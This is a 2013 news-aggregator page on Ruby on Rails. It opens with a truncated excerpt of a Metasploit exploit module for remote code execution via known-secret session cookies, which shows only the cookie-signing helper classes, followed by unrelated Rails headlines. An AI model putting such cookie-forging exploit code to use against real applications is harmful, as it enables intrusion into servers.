12 Aug '13, 4pm

Ruby on Rails Known Secret Session Cookie Remote Code Execution

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 class MessageVerifier class InvalidSignature < StandardError; end def initialize(secret, options = {}) @secret = secret @digest = options[:digest] || 'SHA1' @serializer = options[:serializer] || Marshal end def generate(value) data = ::Base64.strict_encode64(@serializer.dump(value)) "#{data}--#{generate_digest(data)}" end def generate_digest(data) require 'openssl' unless defined?(OpenSSL) OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data) end end class MessageEncryptor module NullSerializer #...

Full article: http://www.exploit-db.com/exploits/27527/

Tweets

Ruby on Rails Known Secret Session Cookie Remot...

cxsecurity.com 12 Aug '13, 6am

Ruby on Rails Known Secret Session Cookie Remote Code Execution

Ruby on Rails Known Secret Session Cookie Remot...

packetstormsecurity.com 11 Aug '13, 5pm

This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the...

#PacketStorm Ruby on Rails Known Secret Session...

packetstormsecurity.com 11 Aug '13, 6pm

This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the...

[remote exploits] - Ruby on Rails Known Secret ...

1337day.com 11 Aug '13, 6pm

Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and s...

Xavier Noria, a @rails core member, will have a...

This talk explores numbers in Ruby: integers, arbitrary-precision integers, floats, arbitrary-precision decimals, and rati...

NEW POST: Ruby on Rails Interviewing (part 1)

joshuakemp.blogspot.com 12 Aug '13, 8am

Since I am happily hired now, I thought I would spill the beans on my interviewing experience. Now all the things I say, n...

#reddit Log4r for Ruby on Rails: Part I of “Sca...

reddit.com 19 Aug '13, 2pm

Please try to keep submissions on topic and of high quality. Just because it has a computer in it doesn't make it programm...

A startup template for Ruby on Rails 4 applicat...

thechangelog.com 13 Aug '13, 4pm

Way back in January, I wrote a blog post called “Rails has two default stacks” . In it, I discussed how people like to cus...

Starbucks' Secret Menu? (customized drinks)

Starbucks' Secret Menu? (customized drinks)

soshiok.com 13 Aug '13, 1pm

Singapore, August 13, 2013 By Lisa Oon, My Paper Raspberry cheesecake frappuccino, tuxedo mocha, and chocolate pumpkin lat...

After Two Decades of Programming, I Use Rails

toptal.com 16 Aug '13, 5pm

It’s possible that nobody would even know about Ruby if it weren’t for Rails itself. Some people like to belittle Ruby by ...

Double Shot #1181: heroku-new – Command-line pl...

afreshcup.com 16 Aug '13, 11am

is Mike Gunderloy's software development weblog, covering Ruby on Rails and whatever else I find interesting in the univer...

Connecting Ruby & Active Record Without Rails - Guest post by Daniel Friedman @frieddaniel…

Connecting Ruby & Active Record Without Rails -...

blog.flatironschool.com 13 Aug '13, 5pm

Connecting Ruby & Active Record Without Rails The following is a guest post by Daniel Friedman and originally appeared on ...

#freelance #loker Blog website in Ruby On Rails...

freelancer.co.id 11 Aug '13, 7am

I need blog website similar to http://www.androidpit.com/, in Ruby on Rails. I need this done in Rails 3. I will be deploy...

RailsClub'Moscow 2013 – 28 сентября в Москве. К...

habrahabr.ru 14 Aug '13, 12pm

– Obie Fernandez (США), автор серии книг “The Rails Way”, основатель Hashrocket – Linda Liukas (США), обладатель Ruby Hero...